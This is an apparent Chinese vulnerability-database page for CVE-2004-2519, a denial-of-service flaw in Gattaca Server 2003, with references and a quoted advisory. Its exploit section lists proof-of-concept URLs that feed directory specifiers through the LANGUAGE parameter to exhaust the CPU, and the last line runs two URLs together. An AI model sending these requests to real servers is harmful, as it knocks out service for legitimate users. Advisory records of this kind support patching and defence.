Gattaca Server 2003多个服务拒绝漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108051 漏洞类型 其他
发布时间 2004-07-15 更新时间 2006-01-24
CVE编号 CVE-2004-2519 CNNVD-ID CNNVD-200412-515
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/24282
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-515
|漏洞详情
GattacaServer20031.1.10.0版本存在漏洞。远程攻击者借助目录说明符导致服务拒绝(CPU消耗),这些目录说明符在(1)index.tmpl和(2)web.tmpl的LANGUAGE参数中,比如(a)斜线"/",(b)反斜线"\",(c)点".",(d)点点"..",和(e)内部斜线"lang//en"。
|漏洞EXP
source: http://www.securityfocus.com/bid/10728/info

It is reported that Gattaca Server 2003 contains multiple denial of service vulnerabilities.

These vulnerabilities allow a remote attacker to crash the application, denying service to legitimate users.

Version 1.1.10.0 is reported vulnerable. Prior versions may also contain these vulnerabilities as well. 

http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en
|参考资料

来源:www.gattaca-server.com
链接:http://www.gattaca-server.com/cgi-bin/yabb/YaBB.pl?board=gattaca_discussion;action=display;num=1091194176;start=0#0
来源:XF
名称:gattaca-language-path-disclosure(16700)
链接:http://xforce.iss.net/xforce/xfdb/16700
来源:BID
名称:10728
链接:http://www.securityfocus.com/bid/10728
来源:OSVDB
名称:7923
链接:http://www.osvdb.org/7923
来源:SECTRACK
名称:1010703
链接:http://securitytracker.com/id?1010703
来源:SECUNIA
名称:12071
链接:http://secunia.com/advisories/12071
来源:members.lycos.co.uk
链接:http://members.lycos.co.uk/r34ct/main/Gattaca%20Server%202003.txt